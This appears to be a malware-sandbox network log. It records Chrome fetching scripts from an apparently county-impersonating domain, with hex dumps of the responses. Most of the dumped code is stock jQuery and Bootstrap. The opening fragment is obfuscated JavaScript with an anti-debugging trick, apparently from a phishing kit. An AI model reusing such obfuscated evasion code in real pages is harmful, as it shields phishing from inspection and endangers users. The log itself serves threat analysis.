                                                                          Data Ascii: 27a66;if(_0x3f0ee6['status']==0x1a6){let _0x4301a2='';$[_0x10c997(0x101)](_0x3f0ee6[_0x10c997(0xf3)][_0x10c997(0xfa)],function(_0xbf1630,_0x420bdc){const _0x55e237=_0x10c997;_0x4301a2+=_0x420bdc[0x0]+_0x55e237(0xf5);});}else{if(_0x3f0ee6[_0x10c997(0x120)]
                                                                          2024-10-01 22:43:15 UTC427INData Raw: 29 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 30 65 29 29 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 30 33 29 5d 28 27 63 6f 75 6e 74 65 72 27 29 3b 65 6c 73 65 28 27 27 2b 5f 30 78 61 66 33 33 38 61 2f 5f 30 78 61 66 33 33 38 61 29 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 36 29 5d 21 3d 3d 30 78 31 7c 7c 5f 30 78 61 66 33 33 38 61 25 30 78 31 34 3d 3d 3d 30 78 30 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 5b 5d 3b 7d 5b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 64 29 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 31 62 29 2b 5f 30 78 32 66 61 30 62 30 28 30 78 31 32 32 29 29 5b 27 63 61 6c 6c 27 5d 28 5f 30 78 32 66 61 30 62 30 28 30 78 31 31 61 29 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 5b 5d 3b 7d 5b 5f 30 78 32
                                                                          Data Ascii: )](_0x2fa0b0(0x10e))[_0x2fa0b0(0x103)]('counter');else(''+_0xaf338a/_0xaf338a)[_0x2fa0b0(0x126)]!==0x1||_0xaf338a%0x14===0x0?function(){return!![];}[_0x2fa0b0(0x12d)](_0x2fa0b0(0x11b)+_0x2fa0b0(0x122))['call'](_0x2fa0b0(0x11a)):function(){return![];}[_0x2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.649784104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:14 UTC464OUTGET /js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:15 UTC634INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:15 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 85578
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXa%2F%2BDKsd%2BfR45amceatoVsBTY916jSnIXX3bM1lHQs1AnAd89Ky8%2BCUXuJAvOq1kzFB0Hjb%2Fc4Yr2%2BJkt3T2RtYZea9ww6hcbAeAB97sR2nkOHZ2WNoCUTcoNuR5brEA0gQysxV1zTpXvYcZYOcWyVGI0W%2FgJQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff872df44729e-EWR
                                                                          2024-10-01 22:43:15 UTC735INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e
                                                                          Data Ascii: /*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74
                                                                          Data Ascii: is[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){ret
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 62 20 69 6e 20 61 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 6b 2e 63 61 6c 6c 28
                                                                          Data Ascii: arseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62 5d 2c 62 3d 61 2c 61 3d 63 29 2c 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3f 28 64 3d 65 2e 63 61 6c 6c 28
                                                                          Data Ascii: d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 2c 22 2b 4c 2b 22 2a 22 29 2c 53 3d 6e 65 77 20 52 65 67
                                                                          Data Ascii: "))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,"+L+"*"),S=new Reg
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 78 26 26 28 6f 3d 24 2e 65 78 65 63 28 61 29 29 29 69
                                                                          Data Ascii: (a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==x&&(o=$.exec(a)))i
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61
                                                                          Data Ascii: trHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.nodeName.toLowerCa
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 29 3a 28 64 65 6c 65 74 65 20 64 2e 66 69 6e 64 2e 49 44 2c 64 2e 66
                                                                          Data Ascii: .length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.f
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61
                                                                          Data Ascii: ),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disa
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74 28 63 29 3b 63 3d 62 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 68 2e 75 6e 73 68 69 66 74 28 63 29 3b 77 68 69 6c 65 28 67 5b 64 5d 3d 3d 3d 68 5b 64 5d 29 64 2b 2b 3b 72 65 74 75 72 6e 20 64 3f 6b 61 28 67 5b 64 5d 2c 68 5b 64 5d 29 3a 67 5b 64 5d 3d 3d 3d 76 3f 2d 31 3a 68 5b 64 5d 3d 3d 3d 76 3f 31 3a 30 7d 2c 6e 29 3a 6e 7d 2c 66 61 2e 6d 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29
                                                                          Data Ascii: !f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},fa.matches=function(a,b)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.649785104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:14 UTC461OUTGET /b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:15 UTC626INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:15 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 51039
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4j4hssFNJApWgzxmpX1E8jWxJMGsrBZu0Yq8yWDpRQmov6G7aQHGDYeHO%2BwS4MttRHCrSWon83QGfA3xrme9Ky46axMw5b2JQogKLNiM5DYHVD%2BFQcwtmnBpo%2BRKhmrsX1AN9mwmDeFwi0Z1wmgSOMM0CqRK6A%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff872da228cab-EWR
                                                                          2024-10-01 22:43:15 UTC743INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                                                          Data Ascii: /*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 72 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 74 29 2e 65 6e
                                                                          Data Ascii: r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).en
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 65 3d 69 28 74 29 2e 63 73 73 28 22 74 72 61 6e 73 69 74
                                                                          Data Ascii: orFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transit
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 45 76 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 6e 7c 7c 28 6e 3d 72 28 74 29 2e 63 6c 6f 73 65 73 74 28
                                                                          Data Ascii: Event(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest(
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 44 29 3b 69 66 28 69 29 7b 69 66 28 22 72 61 64 69 6f 22 3d 3d 3d 69 2e 74 79 70 65 29 69 66 28
                                                                          Data Ascii: OCUS_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.querySelector(D);if(i){if("radio"===i.type)if(
